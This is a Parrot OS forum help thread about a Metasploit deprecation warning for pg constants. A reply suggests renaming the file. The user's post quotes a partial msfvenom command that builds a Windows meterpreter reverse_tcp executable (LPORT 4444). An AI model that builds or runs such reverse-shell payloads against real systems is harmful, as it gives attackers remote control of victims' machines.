Problem after use msfvenom

What version of Parrot are you running? (include version (e.g. 4.6), edition(e.g. Home//KDE/OVA, etc.), and architecture (currently we only support amd64)

Linux version 5.6.0-2parrot1-amd64 ([email protected]) (gcc version 9.3.0 (Debian 9.3.0-13)) #1 SMP Debian 5.6.14-2parrot1 (2020-05-23)

What method did you use to install Parrot? (Debian Standard / Debian GTK / parrot-experimental)

Standard

Configured to multiboot with other systems? (yes / no)

Dual boot

If there are any similar issues or solutions, link to them below:

dont find it :(

If there are any error messages or relevant logs, post them below:

After use msfvenom to configure my payload : 

`windows/x64/meterpreter/reverse_tcp LHOST: XXX.XXX.X.XX LPORT: 4444 -f exe > reverse.exe` 

cat reverse.exe

i got this message :

-----------------------------------------------------------------------------------
    The pg and/or activerecord gem version has changed, meaning deprecated pg constants
    may no longer be in use, so try deleting this file to see if the
    'The PGconn, PGresult, and PGError constants are deprecated...' message has gone:
    /usr/share/metasploit-framework/lib/pg/deprecated_constants.rb
    -----------------------------------------------------------------------------------

i dont know what i have to do … thank a lot guys for your help

Rather than deleting the /usr/share/metasploit-framework/lib/pg/deprecated_constants.rb file (since that may or may not be the problem, but probably is…) i would simply re-name it as, /usr/share/metasploit-framework/lib/pg/deprecated_constants.rb.bak
then try it again.
this is great material for understanding the under-pinnings of the framework itself whether you are a devoper or not.

This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.